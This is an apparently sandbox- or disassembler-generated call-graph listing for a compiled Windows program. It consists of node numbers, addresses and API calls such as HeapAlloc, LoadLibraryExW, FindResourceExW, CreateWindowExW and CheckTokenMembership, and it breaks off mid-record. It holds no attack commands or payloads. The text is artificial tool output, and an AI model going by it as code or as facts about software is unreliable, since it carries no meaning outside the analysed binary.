104464->104462 104481 d6a132 Sleep 104464->104481 104465->104374 104466->104377 104467->104373 104468->104449 104469->104451 104471 d69e3b InitializeCriticalSectionEx 104470->104471 104472 d69e48 InitializeCriticalSectionAndSpinCount 104470->104472 104471->104454 104472->104454 104474 d75201 104473->104474 104480 d7521c 104473->104480 104475 d7520d 104474->104475 104474->104480 104482 d68b28 59 API calls __getptd_noexit 104475->104482 104476 d7522c HeapAlloc 104479 d75212 104476->104479 104476->104480 104479->104462 104480->104476 104480->104479 104483 d633a1 DecodePointer 104480->104483 104481->104464 104482->104479 104483->104480 104485 d69c2f EnterCriticalSection 104484->104485 104486 d69c1c 104484->104486 104485->104381 104492 d69c93 104486->104492 104488 d69c22 104488->104485 104516 d630b5 59 API calls 3 library calls 104488->104516 104491->104385 104493 d69c9f __write 104492->104493 104494 d69cc0 104493->104494 104495 d69ca8 104493->104495 104504 d69ce1 __write 104494->104504 104520 d6881d 59 API calls __malloc_crt 104494->104520 104517 d6a16b 59 API calls __NMSG_WRITE 104495->104517 104497 d69cad 104518 d6a1c8 59 API calls 7 library calls 104497->104518 104500 d69cd5 104502 d69cdc 104500->104502 104503 d69ceb 104500->104503 104501 d69cb4 104519 d6309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104501->104519 104521 d68b28 59 API calls __getptd_noexit 104502->104521 104507 d69c0b __lock 59 API calls 104503->104507 104504->104488 104508 d69cf2 104507->104508 104510 d69d17 104508->104510 104511 d69cff 104508->104511 104522 d62d55 104510->104522 104512 d69e2b __mtinitlocks 2 API calls 104511->104512 104514 d69d0b 104512->104514 104528 d69d33 LeaveCriticalSection _doexit 104514->104528 104517->104497 104518->104501 104520->104500 104521->104504 104523 d62d5e HeapFree 104522->104523 104524 d62d87 _free 104522->104524 104523->104524 104525 d62d73 104523->104525 104524->104514 104529 d68b28 59 API calls __getptd_noexit 104525->104529 104527 d62d79 GetLastError 104527->104524 104528->104504 104529->104527 104530->104401 104531->104406 104532->104417 104534 d68dd1 104533->104534 104539 d68c59 104534->104539 104538 d68dec 104538->104420 104540 d68c73 _memset ___raise_securityfailure 104539->104540 104541 d68c93 IsDebuggerPresent 104540->104541 104547 d6a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104541->104547 104544 d68d57 ___raise_securityfailure 104548 d6c5f6 104544->104548 104545 d68d7a 104546 d6a140 GetCurrentProcess TerminateProcess 104545->104546 104546->104538 104547->104544 104549 d6c600 IsProcessorFeaturePresent 104548->104549 104550 d6c5fe 104548->104550 104552 d7590a 104549->104552 104550->104545 104555 d758b9 5 API calls ___raise_securityfailure 104552->104555 104554 d759ed 104554->104545 104555->104554 104557 d6a4d4 EncodePointer 104556->104557 104557->104557 104558 d6a4ee 104557->104558 104558->104424 104562 d62c44 104559->104562 104561 d62d4b 104561->104426 104563 d62c50 __write 104562->104563 104570 d63217 104563->104570 104569 d62c77 __write 104569->104561 104571 d69c0b __lock 59 API calls 104570->104571 104572 d62c59 104571->104572 104573 d62c88 RtlDecodePointer DecodePointer 104572->104573 104574 d62c65 104573->104574 104575 d62cb5 104573->104575 104584 d62c82 104574->104584 104575->104574 104587 d687a4 60 API calls ___wstrgtold12_l 104575->104587 104577 d62d18 EncodePointer EncodePointer 104577->104574 104578 d62cc7 104578->104577 104579 d62cec 104578->104579 104588 d68864 62 API calls 2 library calls 104578->104588 104579->104574 104583 d62d06 EncodePointer 104579->104583 104589 d68864 62 API calls 2 library calls 104579->104589 104582 d62d00 104582->104574 104582->104583 104583->104577 104590 d63220 104584->104590 104587->104578 104588->104579 104589->104582 104593 d69d75 LeaveCriticalSection 104590->104593 104592 d62c87 104592->104569 104593->104592 104595 d69c0b __lock 59 API calls 104594->104595 104596 d63377 DecodePointer EncodePointer 104595->104596 104659 d69d75 LeaveCriticalSection 104596->104659 104598 d44849 104599 d633d4 104598->104599 104600 d633de 104599->104600 104601 d633f8 104599->104601 104600->104601 104660 d68b28 59 API calls __getptd_noexit 104600->104660 104601->104433 104603 d633e8 104661 d68db6 9 API calls ___wstrgtold12_l 104603->104661 104605 d633f3 104605->104433 104606->104435 104608 d43b47 __ftell_nolock 104607->104608 104662 d47667 104608->104662 104612 d43b7a IsDebuggerPresent 104613 d7d272 MessageBoxA 104612->104613 104614 d43b88 104612->104614 104616 d7d28c 104613->104616 104615 d43ba5 104614->104615 104614->104616 104645 d43c61 104614->104645 104748 d47285 104615->104748 104886 d47213 60 API calls Mailbox 104616->104886 104617 d43c68 SetCurrentDirectoryW 104620 d43c75 Mailbox 104617->104620 104620->104437 104621 d7d29c 104626 d7d2b2 SetCurrentDirectoryW 104621->104626 104623 d43bc3 GetFullPathNameW 104764 d47bcc 104623->104764 104625 d43bfe 104773 d5092d 104625->104773 104626->104620 104629 d43c1c 104630 d43c26 104629->104630 104887 d9874b AllocateAndInitializeSid CheckTokenMembership FreeSid 104629->104887 104789 d43a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104630->104789 104633 d7d2cf 104633->104630 104636 d7d2e0 104633->104636 104888 d44706 104636->104888 104637 d43c30 104639 d43c43 104637->104639 104797 d4434a 104637->104797 104808 d509d0 104639->104808 104645->104617 104659->104598 104660->104603 104661->104605 104915 d60db6 104662->104915 104664 d47688 104665 d60db6 Mailbox 60 API calls 104664->104665 104666 d43b51 GetCurrentDirectoryW 104665->104666 104667 d43766 104666->104667 104668 d47667 60 API calls 104667->104668 104669 d4377c 104668->104669 104953 d43d31 104669->104953 104671 d4379a 104672 d44706 62 API calls 104671->104672 104673 d437ae 104672->104673 104674 d47de1 60 API calls 104673->104674 104675 d437bb 104674->104675 104967 d44ddd 104675->104967 104678 d7d173 105038 da955b 104678->105038 104679 d437dc Mailbox 104991 d48047 104679->104991 104683 d7d192 104685 d62d55 _free 59 API calls 104683->104685 104687 d7d19f 104685->104687 104689 d44e4a 85 API calls 104687->104689 104691 d7d1a8 104689->104691 104695 d43ed0 60 API calls 104691->104695 104692 d47de1 60 API calls 104693 d43808 104692->104693 104998 d484c0 104693->104998 104697 d7d1c3 104695->104697 104696 d4381a Mailbox 104698 d47de1 60 API calls 104696->104698 104699 d43ed0 60 API calls 104697->104699 104700 d43840 104698->104700 104702 d7d1df 104699->104702 104701 d484c0 70 API calls 104700->104701 104705 d4384f Mailbox 104701->104705 104703 d44706 62 API calls 104702->104703 104704 d7d204 104703->104704 104706 d43ed0 60 API calls 104704->104706 104708 d47667 60 API calls 104705->104708 104707 d7d210 104706->104707 104709 d48047 60 API calls 104707->104709 104710 d4386d 104708->104710 104711 d7d21e 104709->104711 105002 d43ed0 104710->105002 104713 d43ed0 60 API calls 104711->104713 104715 d7d22d 104713->104715 104721 d48047 60 API calls 104715->104721 104717 d43887 104717->104691 104718 d43891 104717->104718 104719 d62efd _W_store_winword 61 API calls 104718->104719 104720 d4389c 104719->104720 104720->104697 104722 d438a6 104720->104722 104724 d7d24f 104721->104724 104723 d62efd _W_store_winword 61 API calls 104722->104723 104726 d438b1 104723->104726 104725 d43ed0 60 API calls 104724->104725 104727 d7d25c 104725->104727 104726->104702 104728 d438bb 104726->104728 104727->104727 104729 d62efd _W_store_winword 61 API calls 104728->104729 104730 d438c6 104729->104730 104730->104715 104731 d43907 104730->104731 104733 d43ed0 60 API calls 104730->104733 104731->104715 104732 d43914 104731->104732 105018 d492ce 104732->105018 104734 d438ea 104733->104734 104737 d48047 60 API calls 104734->104737 104739 d438f8 104737->104739 104741 d43ed0 60 API calls 104739->104741 104741->104731 104743 d4928a 60 API calls 104745 d4394f 104743->104745 104744 d48ee0 61 API calls 104744->104745 104745->104743 104745->104744 104746 d43ed0 60 API calls 104745->104746 104747 d43995 Mailbox 104745->104747 104746->104745 104747->104612 104749 d47292 __ftell_nolock 104748->104749 104750 d7ea22 _memset 104749->104750 104751 d472ab 104749->104751 104754 d7ea3e GetOpenFileNameW 104750->104754 105932 d44750 104751->105932 104756 d7ea8d 104754->104756 104758 d47bcc 60 API calls 104756->104758 104759 d7eaa2 104758->104759 104759->104759 104761 d472c9 105960 d4686a 104761->105960 104765 d47c45 104764->104765 104766 d47bd8 __wsetenvp 104764->104766 104767 d47d2c 60 API calls 104765->104767 104768 d47c13 104766->104768 104769 d47bee 104766->104769 104772 d47bf6 _memmove 104767->104772 104771 d48029 60 API calls 104768->104771 106279 d47f27 60 API calls Mailbox 104769->106279 104771->104772 104772->104625 104774 d5093a __ftell_nolock 104773->104774 106280 d46d80 104774->106280 104776 d5093f 104788 d43c14 104776->104788 106291 d5119e 90 API calls 104776->106291 104778 d5094c 104778->104788 106292 d53ee7 92 API calls Mailbox 104778->106292 104780 d50955 104781 d50959 GetFullPathNameW 104780->104781 104780->104788 104782 d47bcc 60 API calls 104781->104782 104783 d50985 104782->104783 104784 d47bcc 60 API calls 104783->104784 104785 d50992 104784->104785 104786 d84cab _wcscat 104785->104786 104787 d47bcc 60 API calls 104785->104787 104787->104788 104788->104621 104788->104629 104790 d43ab0 LoadImageW RegisterClassExW 104789->104790 104791 d7d261 104789->104791 106334 d43041 7 API calls 104790->106334 106335 d447a0 LoadImageW EnumResourceNamesW 104791->106335 104794 d43b34 104796 d439d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104794->104796 104795 d7d26a 104796->104637 104798 d44375 _memset 104797->104798 106336 d44182 104798->106336 104809 d84cc3 104808->104809 104823 d509f5 104808->104823 106426 da9e4a 90 API calls 4 library calls 104809->106426 104851 d50a05 Mailbox 104823->104851 104886->104621 104887->104633 104889 d71940 __ftell_nolock 104888->104889 104890 d44713 GetModuleFileNameW 104889->104890 104891 d47de1 60 API calls 104890->104891 104892 d44739 104891->104892 104893 d44750 61 API calls 104892->104893 104894 d44743 Mailbox 104893->104894 104917 d60dbe 104915->104917 104918 d60dd8 104917->104918 104920 d60ddc std::exception::exception 104917->104920 104925 d6571c 104917->104925 104942 d633a1 DecodePointer 104917->104942 104918->104664 104943 d6859b RaiseException 104920->104943 104922 d60e06 104944 d684d1 59 API calls _free 104922->104944 104924 d60e18 104924->104664 104926 d65797 104925->104926 104933 d65728 104925->104933 104951 d633a1 DecodePointer 104926->104951 104928 d6579d 104952 d68b28 59 API calls __getptd_noexit 104928->104952 104931 d6575b RtlAllocateHeap 104931->104933 104941 d6578f 104931->104941 104933->104931 104934 d65783 104933->104934 104938 d65781 104933->104938 104939 d65733 104933->104939 104948 d633a1 DecodePointer 104933->104948 104949 d68b28 59 API calls __getptd_noexit 104934->104949 104950 d68b28 59 API calls __getptd_noexit 104938->104950 104939->104933 104945 d6a16b 59 API calls __NMSG_WRITE 104939->104945 104946 d6a1c8 59 API calls 7 library calls 104939->104946 104947 d6309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104939->104947 104941->104917 104942->104917 104943->104922 104944->104924 104945->104939 104946->104939 104948->104933 104949->104938 104950->104941 104951->104928 104952->104941 104954 d43d3e __ftell_nolock 104953->104954 104955 d47bcc 60 API calls 104954->104955 104957 d43ea4 Mailbox 104954->104957 104958 d43d70 104955->104958 104957->104671 104966 d43da6 Mailbox 104958->104966 105079 d479f2 104958->105079 104959 d479f2 60 API calls 104959->104966 104960 d43e77 104960->104957 104961 d47de1 60 API calls 104960->104961 104962 d43e98 104961->104962 104964 d43f74 60 API calls 104962->104964 104963 d47de1 60 API calls 104963->104966 104964->104957 104966->104957 104966->104959 104966->104960 104966->104963 105082 d43f74 104966->105082 105092 d44bb5 104967->105092 104972 d7d8e6 104975 d44e4a 85 API calls 104972->104975 104973 d44e08 LoadLibraryExW 105102 d44b6a 104973->105102 104977 d7d8ed 104975->104977 104979 d44b6a 3 API calls 104977->104979 104980 d7d8f5 104979->104980 105128 d44f0b 104980->105128 104981 d44e2f 104981->104980 104982 d44e3b 104981->104982 104984 d44e4a 85 API calls 104982->104984 104986 d437d4 104984->104986 104986->104678 104986->104679 104988 d7d91c 105136 d44ec7 104988->105136 104990 d7d929 104992 d48052 104991->104992 104993 d437ef 104991->104993 105565 d47f77 60 API calls 2 library calls 104992->105565 104995 d4928a 104993->104995 104996 d60db6 Mailbox 60 API calls 104995->104996 104997 d437fb 104996->104997 104997->104692 104999 d484cb 104998->104999 105000 d484f2 104999->105000 105566 d489b3 104999->105566 105000->104696 105003 d43ef3 105002->105003 105004 d43eda 105002->105004 105006 d47bcc 60 API calls 105003->105006 105005 d48047 60 API calls 105004->105005 105007 d43879 105005->105007 105006->105007 105008 d62efd 105007->105008 105009 d62f7e 105008->105009 105010 d62f09 105008->105010 105594 d62f90 61 API calls 3 library calls 105009->105594 105017 d62f2e 105010->105017 105592 d68b28 59 API calls __getptd_noexit 105010->105592 105013 d62f8b 105013->104717 105014 d62f15 105593 d68db6 9 API calls ___wstrgtold12_l 105014->105593 105016 d62f20 105016->104717 105017->104717 105019 d492d6 105018->105019 105020 d60db6 Mailbox 60 API calls 105019->105020 105022 d492e4 105020->105022 105021 d43924 105024 d49050 105021->105024 105022->105021 105595 d491fc 60 API calls Mailbox 105022->105595 105596 d49160 105024->105596 105026 d60db6 Mailbox 60 API calls 105028 d43932 105026->105028 105027 d4905f 105027->105026 105027->105028 105029 d48ee0 105028->105029 105030 d7f17c 105029->105030 105032 d48ef7 105029->105032 105030->105032 105606 d48bdb 60 API calls Mailbox 105030->105606 105033 d49040 105032->105033 105034 d48ff8 105032->105034 105037 d48fff 105032->105037 105605 d49d3c 61 API calls Mailbox 105033->105605 105036 d60db6 Mailbox 60 API calls 105034->105036 105036->105037 105037->104745 105039 d44ee5 86 API calls 105038->105039 105040 da95ca 105039->105040 105607 da9734 105040->105607 105043 d44f0b 75 API calls 105044 da95f7 105043->105044 105045 d44f0b 75 API calls 105044->105045 105046 da9607 105045->105046 105047 d44f0b 75 API calls 105046->105047 105048 da9622 105047->105048 105049 d44f0b 75 API calls 105048->105049 105050 da963d 105049->105050 105051 d44ee5 86 API calls 105050->105051 105052 da9654 105051->105052 105053 d6571c __malloc_crt 59 API calls 105052->105053 105054 da965b 105053->105054 105055 d6571c __malloc_crt 59 API calls 105054->105055 105056 da9665 105055->105056 105057 d44f0b 75 API calls 105056->105057 105058 da9679 105057->105058 105059 da9109 GetSystemTimeAsFileTime 105058->105059 105060 da968c 105059->105060 105061 da96a1 105060->105061 105062 da96b6 105060->105062 105063 d62d55 _free 59 API calls 105061->105063 105064 da971b 105062->105064 105065 da96bc 105062->105065 105067 da96a7 105063->105067 105066 d62d55 _free 59 API calls 105064->105066 105613 da8b06 105065->105613 105071 d7d186 105066->105071 105069 d62d55 _free 59 API calls 105067->105069 105069->105071 105071->104683 105073 d44e4a 105071->105073 105072 d62d55 _free 59 API calls 105072->105071 105074 d44e54 105073->105074 105075 d44e5b 105073->105075 105076 d653a6 __fcloseall 84 API calls 105074->105076 105077 d44e6a 105075->105077 105078 d44e7b FreeLibrary 105075->105078 105076->105075 105077->104683 105078->105077 105088 d47e4f 105079->105088 105081 d479fd 105081->104958 105083 d43f82 105082->105083 105087 d43fa4 _memmove 105082->105087 105085 d60db6 Mailbox 60 API calls 105083->105085 105084 d60db6 Mailbox 60 API calls 105086 d43fb8 105084->105086 105085->105087 105086->104966 105087->105084 105089 d47e62 105088->105089 105091 d47e5f _memmove 105088->105091 105090 d60db6 Mailbox 60 API calls 105089->105090 105090->105091 105091->105081 105141 d44c03 105092->105141 105095 d44bdc 105096 d44bf5 105095->105096 105097 d44bec FreeLibrary 105095->105097 105099 d6525b 105096->105099 105097->105096 105098 d44c03 2 API calls 105098->105095 105145 d65270 105099->105145 105101 d44dfc 105101->104972 105101->104973 105302 d44c36 105102->105302 105105 d44b8f 105107 d44ba1 FreeLibrary 105105->105107 105108 d44baa 105105->105108 105106 d44c36 2 API calls 105106->105105 105107->105108 105109 d44c70 105108->105109 105110 d60db6 Mailbox 60 API calls 105109->105110 105111 d44c85 105110->105111 105306 d4522e 105111->105306 105113 d44c91 _memmove 105114 d44ccc 105113->105114 105116 d44dc1 105113->105116 105117 d44d89 105113->105117 105115 d44ec7 70 API calls 105114->105115 105125 d44cd5 105115->105125 105320 da991b 96 API calls 105116->105320 105309 d44e89 CreateStreamOnHGlobal 105117->105309 105120 d44f0b 75 API calls 105120->105125 105122 d44d69 105122->104981 105123 d7d8a7 105124 d44ee5 86 API calls 105123->105124 105126 d7d8bb 105124->105126 105125->105120 105125->105122 105125->105123 105315 d44ee5 105125->105315 105127 d44f0b 75 API calls 105126->105127 105127->105122 105129 d44f1d 105128->105129 105130 d7d9cd 105128->105130 105344 d655e2 105129->105344 105133 da9109 105542 da8f5f 105133->105542 105135 da911f 105135->104988 105137 d44ed6 105136->105137 105138 d7d990 105136->105138 105547 d65c60 105137->105547 105140 d44ede 105140->104990 105142 d44bd0 105141->105142 105143 d44c0c LoadLibraryA 105141->105143 105142->105095 105142->105098 105143->105142 105144 d44c1d GetProcAddress 105143->105144 105144->105142 105146 d6527c __write 105145->105146 105147 d6528f 105146->105147 105150 d652c0 105146->105150 105194 d68b28 59 API calls __getptd_noexit 105147->105194 105149 d65294 105195 d68db6 9 API calls ___wstrgtold12_l 105149->105195 105164 d704e8 105150->105164 105153 d652c5 105154 d652ce 105153->105154 105155 d652db 105153->105155 105196 d68b28 59 API calls __getptd_noexit 105154->105196 105157 d65305 105155->105157 105158 d652e5 105155->105158 105179 d70607 105157->105179 105197 d68b28 59 API calls __getptd_noexit 105158->105197 105159 d6529f __write @_EH4_CallFilterFunc@8 105159->105101 105165 d704f4 __write 105164->105165 105166 d69c0b __lock 59 API calls 105165->105166 105177 d70502 105166->105177 105167 d70576 105199 d705fe 105167->105199 105168 d7057d 105204 d6881d 59 API calls __malloc_crt 105168->105204 105171 d70584 105171->105167 105173 d69e2b __mtinitlocks 2 API calls 105171->105173 105172 d705f3 __write 105172->105153 105176 d705aa EnterCriticalSection 105173->105176 105174 d69c93 __mtinitlocknum 59 API calls 105174->105177 105176->105167 105177->105167 105177->105168 105177->105174 105202 d66c50 60 API calls __lock 105177->105202 105203 d66cba LeaveCriticalSection LeaveCriticalSection _doexit 105177->105203 105188 d70627 __wopenfile 105179->105188 105180 d70641 105209 d68b28 59 API calls __getptd_noexit 105180->105209 105181 d707fc 105181->105180 105185 d7085f 105181->105185 105183 d70646 105210 d68db6 9 API calls ___wstrgtold12_l 105183->105210 105206 d785a1 105185->105206 105186 d65310 105198 d65332 LeaveCriticalSection LeaveCriticalSection _fseek 105186->105198 105188->105180 105188->105181 105211 d637cb 61 API calls 2 library calls 105188->105211 105190 d707f5 105190->105181 105212 d637cb 61 API calls 2 library calls 105190->105212 105192 d70814 105192->105181 105213 d637cb 61 API calls 2 library calls 105192->105213 105194->105149 105195->105159 105196->105159 105197->105159 105198->105159 105205 d69d75 LeaveCriticalSection 105199->105205 105201 d70605 105201->105172 105202->105177 105203->105177 105204->105171 105205->105201 105214 d77d85 105206->105214 105208 d785ba 105208->105186 105209->105183 105210->105186 105211->105190 105212->105192 105213->105181 105215 d77d91 __write 105214->105215 105216 d77da7 105215->105216 105219 d77ddd 105215->105219 105299 d68b28 59 API calls __getptd_noexit 105216->105299 105218 d77dac 105300 d68db6 9 API calls ___wstrgtold12_l 105218->105300 105225 d77e4e 105219->105225 105222 d77df9 105301 d77e22 LeaveCriticalSection __unlock_fhandle 105222->105301 105224 d77db6 __write 105224->105208 105226 d77e6e 105225->105226 105227 d644ea __wsopen_nolock 59 API calls 105226->105227 105229 d77e8a 105227->105229 105228 d68dc6 __invoke_watson 8 API calls 105230 d785a0 105228->105230 105231 d77ec4 105229->105231 105239 d77ee7 105229->105239 105298 d77fc1 105229->105298 105232 d77d85 __wsopen_helper 104 API calls 105230->105232 105233 d68af4 __write 59 API calls 105231->105233 105234 d785ba 105232->105234 105235 d77ec9 105233->105235 105234->105222 105236 d68b28 ___wstrgtold12_l 59 API calls 105235->105236 105237 d77ed6 105236->105237 105240 d68db6 ___wstrgtold12_l 9 API calls 105237->105240 105238 d77fa5 105241 d68af4 __write 59 API calls 105238->105241 105239->105238 105247 d77f83 105239->105247 105242 d77ee0 105240->105242 105243 d77faa 105241->105243 105242->105222 105244 d68b28 ___wstrgtold12_l 59 API calls 105243->105244 105245 d77fb7 105244->105245 105246 d68db6 ___wstrgtold12_l 9 API calls 105245->105246 105246->105298 105248 d6d294 __alloc_osfhnd 62 API calls 105247->105248 105249 d78051 105248->105249 105250 d7807e 105249->105250 105251 d7805b 105249->105251 105253 d77cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105250->105253 105252 d68af4 __write 59 API calls 105251->105252 105254 d78060 105252->105254 105264 d780a0 105253->105264 105255 d68b28 ___wstrgtold12_l 59 API calls 105254->105255 105257 d7806a 105255->105257 105256 d7811e GetFileType 105258 d7816b 105256->105258 105259 d78129 GetLastError 105256->105259 105262 d68b28 ___wstrgtold12_l 59 API calls 105257->105262 105269 d6d52a __set_osfhnd 60 API calls 105258->105269 105263 d68b07 __dosmaperr 59 API calls 105259->105263 105260 d780ec GetLastError 105261 d68b07 __dosmaperr 59 API calls 105260->105261 105265 d78111 105261->105265 105262->105242 105266 d78150 CloseHandle 105263->105266 105264->105256 105264->105260 105267 d77cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105264->105267 105271 d68b28 ___wstrgtold12_l 59 API calls 105265->105271 105266->105265 105270 d7815e 105266->105270 105268 d780e1 105267->105268 105268->105256 105268->105260 105274 d78189 105269->105274 105272 d68b28 ___wstrgtold12_l 59 API calls 105270->105272 105271->105298 105273 d78163 105272->105273 105273->105265 105275 d78344 105274->105275 105276 d718c1 __lseeki64_nolock 61 API calls 105274->105276 105284 d7820a 105274->105284 105277 d78517 CloseHandle 105275->105277 105275->105298 105278 d781f3 105276->105278 105279 d77cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105277->105279 105281 d68af4 __write 59 API calls 105278->105281 105278->105284 105280 d7853e 105279->105280 105282 d78546 GetLastError 105280->105282 105283 d78572 105280->105283 105281->105284 105285 d68b07 __dosmaperr 59 API calls 105282->105285 105283->105298 105284->105275 105286 d7823c 105284->105286 105288 d70e5b 71 API calls __read_nolock 105284->105288 105289 d70add __close_nolock 62 API calls 105284->105289 105292 d6d886 __write 79 API calls 105284->105292 105293 d783c1 105284->105293 105296 d718c1 61 API calls __lseeki64_nolock 105284->105296 105287 d78552 105285->105287 105286->105284 105290 d797a2 __chsize_nolock 83 API calls 105286->105290 105291 d6d43d __free_osfhnd 60 API calls 105287->105291 105288->105284 105289->105284 105290->105286 105291->105283 105292->105284 105294 d70add __close_nolock 62 API calls 105293->105294 105295 d783c8 105294->105295 105297 d68b28 ___wstrgtold12_l 59 API calls 105295->105297 105296->105284 105297->105298 105298->105228 105299->105218 105300->105224 105301->105224 105303 d44b83 105302->105303 105304 d44c3f LoadLibraryA 105302->105304 105303->105105 105303->105106 105304->105303 105305 d44c50 GetProcAddress 105304->105305 105305->105303 105307 d60db6 Mailbox 60 API calls 105306->105307 105308 d45240 105307->105308 105308->105113 105310 d44ea3 FindResourceExW 105309->105310 105314 d44ec0 105309->105314 105311 d7d933 LoadResource 105310->105311 105310->105314 105312 d7d948 SizeofResource 105311->105312 105311->105314 105313 d7d95c LockResource 105312->105313 105312->105314 105313->105314 105314->105114 105316 d44ef4 105315->105316 105317 d7d9ab 105315->105317 105321 d6584d 105316->105321 105319 d44f02 105319->105125 105320->105114 105324 d65859 __write 105321->105324 105322 d6586b 105334 d68b28 59 API calls __getptd_noexit 105322->105334 105324->105322 105325 d65891 105324->105325 105336 d66c11 105325->105336 105326 d65870 105335 d68db6 9 API calls ___wstrgtold12_l 105326->105335 105329 d65897 105342 d657be 84 API calls 5 library calls 105329->105342 105331 d658a6 105343 d658c8 LeaveCriticalSection LeaveCriticalSection _fseek 105331->105343 105333 d6587b __write 105333->105319 105334->105326 105335->105333 105337 d66c43 EnterCriticalSection 105336->105337 105338 d66c21 105336->105338 105340 d66c39 105337->105340 105338->105337 105339 d66c29 105338->105339 105341 d69c0b __lock 59 API calls 105339->105341 105340->105329 105341->105340 105342->105331 105343->105333 105347 d655fd 105344->105347 105346 d44f2e 105346->105133 105348 d65609 __write 105347->105348 105349 d6564c 105348->105349 105351 d65644 __write 105348->105351 105353 d6561f _memset 105348->105353 105350 d66c11 __lock_file 60 API calls 105349->105350 105352 d65652 105350->105352 105351->105346 105360 d6541d 105352->105360 105374 d68b28 59 API calls __getptd_noexit 105353->105374 105356 d65639 105375 d68db6 9 API calls ___wstrgtold12_l 105356->105375 105364 d65438 _memset 105360->105364 105366 d65453 105360->105366 105361 d65443 105472 d68b28 59 API calls __getptd_noexit 105361->105472 105363 d65448 105473 d68db6 9 API calls ___wstrgtold12_l 105363->105473 105364->105361 105364->105366 105369 d65493 105364->105369 105376 d65686 LeaveCriticalSection LeaveCriticalSection _fseek 105366->105376 105368 d655a4 _memset 105475 d68b28 59 API calls __getptd_noexit 105368->105475 105369->105366 105369->105368 105377 d646e6 105369->105377 105384 d70e5b 105369->105384 105452 d70ba7 105369->105452 105474 d70cc8 59 API calls 3 library calls 105369->105474 105374->105356 105375->105351 105376->105351 105378 d64705 105377->105378 105379 d646f0 105377->105379 105378->105369 105476 d68b28 59 API calls __getptd_noexit 105379->105476 105381 d646f5 105477 d68db6 9 API calls ___wstrgtold12_l 105381->105477 105383 d64700 105383->105369 105385 d70e93 105384->105385 105386 d70e7c 105384->105386 105387 d715cb 105385->105387 105391 d70ecd 105385->105391 105487 d68af4 59 API calls __getptd_noexit 105386->105487 105503 d68af4 59 API calls __getptd_noexit 105387->105503 105390 d70e81 105488 d68b28 59 API calls __getptd_noexit 105390->105488 105394 d70ed5 105391->105394 105401 d70eec 105391->105401 105392 d715d0 105504 d68b28 59 API calls __getptd_noexit 105392->105504 105489 d68af4 59 API calls __getptd_noexit 105394->105489 105397 d70ee1 105505 d68db6 9 API calls ___wstrgtold12_l 105397->105505 105398 d70eda 105490 d68b28 59 API calls __getptd_noexit 105398->105490 105400 d70f01 105491 d68af4 59 API calls __getptd_noexit 105400->105491 105401->105400 105402 d70f1b 105401->105402 105405 d70f39 105401->105405 105432 d70e88 105401->105432 105402->105400 105407 d70f26 105402->105407 105492 d6881d 59 API calls __malloc_crt 105405->105492 105478 d75c6b 105407->105478 105408 d70f49 105410 d70f51 105408->105410 105411 d70f6c 105408->105411 105493 d68b28 59 API calls __getptd_noexit 105410->105493 105495 d718c1 61 API calls 3 library calls 105411->105495 105412 d7103a 105415 d710b3 ReadFile 105412->105415 105416 d71050 GetConsoleMode 105412->105416 105418 d710d5 105415->105418 105419 d71593 GetLastError 105415->105419 105420 d71064 105416->105420 105421 d710b0 105416->105421 105417 d70f56 105494 d68af4 59 API calls __getptd_noexit 105417->105494 105418->105419 105426 d710a5 105418->105426 105423 d71093 105419->105423 105424 d715a0 105419->105424 105420->105421 105425 d7106a ReadConsoleW 105420->105425 105421->105415 105437 d71099 105423->105437 105496 d68b07 59 API calls 3 library calls 105423->105496 105501 d68b28 59 API calls __getptd_noexit 105424->105501 105425->105426 105428 d7108d GetLastError 105425->105428 105434 d7110a 105426->105434 105435 d71377 105426->105435 105426->105437 105428->105423 105430 d715a5 105502 d68af4 59 API calls __getptd_noexit 105430->105502 105432->105369 105433 d62d55 _free 59 API calls 105433->105432 105436 d711f7 105434->105436 105439 d71176 ReadFile 105434->105439 105435->105437 105440 d7147d ReadFile 105435->105440 105436->105437 105442 d712b4 105436->105442 105443 d712a4 105436->105443 105446 d71264 MultiByteToWideChar 105436->105446 105437->105432 105437->105433 105441 d71197 GetLastError 105439->105441 105450 d711a1 105439->105450 105445 d714a0 GetLastError 105440->105445 105451 d714ae 105440->105451 105441->105450 105442->105446 105499 d718c1 61 API calls 3 library calls 105442->105499 105498 d68b28 59 API calls __getptd_noexit 105443->105498 105445->105451 105446->105428 105446->105437 105450->105434 105497 d718c1 61 API calls 3 library calls 105450->105497 105451->105435 105500 d718c1 61 API calls 3 library calls 105451->105500 105453 d70bb2 105452->105453 105456 d70bc7 105452->105456 105539 d68b28 59 API calls __getptd_noexit 105453->105539 105455 d70bb7 105540 d68db6 9 API calls ___wstrgtold12_l 105455->105540 105458 d70bfc 105456->105458 105464 d70bc2 105456->105464 105541 d75fe4 59 API calls __malloc_crt 105456->105541 105460 d646e6 __fclose_nolock 59 API calls 105458->105460 105461 d70c10 105460->105461 105506 d70d47 105461->105506 105463 d70c17 105463->105464 105465 d646e6 __fclose_nolock 59 API calls 105463->105465 105464->105369 105466 d70c3a 105465->105466 105466->105464 105467 d646e6 __fclose_nolock 59 API calls 105466->105467 105468 d70c46 105467->105468 105468->105464 105469 d646e6 __fclose_nolock 59 API calls 105468->105469 105470 d70c53 105469->105470 105471 d646e6 __fclose_nolock 59 API calls 105470->105471 105471->105464 105472->105363 105473->105366 105474->105369 105475->105363 105476->105381 105477->105383 105479 d75c76 105478->105479 105481 d75c83 105478->105481 105480 d68b28 ___wstrgtold12_l 59 API calls 105479->105480 105482 d75c7b 105480->105482 105483 d75c8f 105481->105483 105484 d68b28 ___wstrgtold12_l 59 API calls 105481->105484 105482->105412 105483->105412 105485 d75cb0 105484->105485 105486 d68db6 ___wstrgtold12_l 9 API calls 105485->105486 105486->105482 105487->105390 105488->105432 105489->105398 105490->105397 105491->105398 105492->105408 105493->105417 105494->105432 105495->105407 105496->105437 105497->105450 105498->105437 105499->105446 105500->105451 105501->105430 105502->105437 105503->105392 105504->105397 105505->105432 105507 d70d53 __write 105506->105507 105508 d70d77 105507->105508 105509 d70d60 105507->105509 105511 d70e3b 105508->105511 105514 d70d8b 105508->105514 105510 d68af4 __write 59 API calls 105509->105510 105513 d70d65 105510->105513 105512 d68af4 __write 59 API calls 105511->105512 105518 d70dae 105512->105518 105515 d68b28 ___wstrgtold12_l 59 API calls 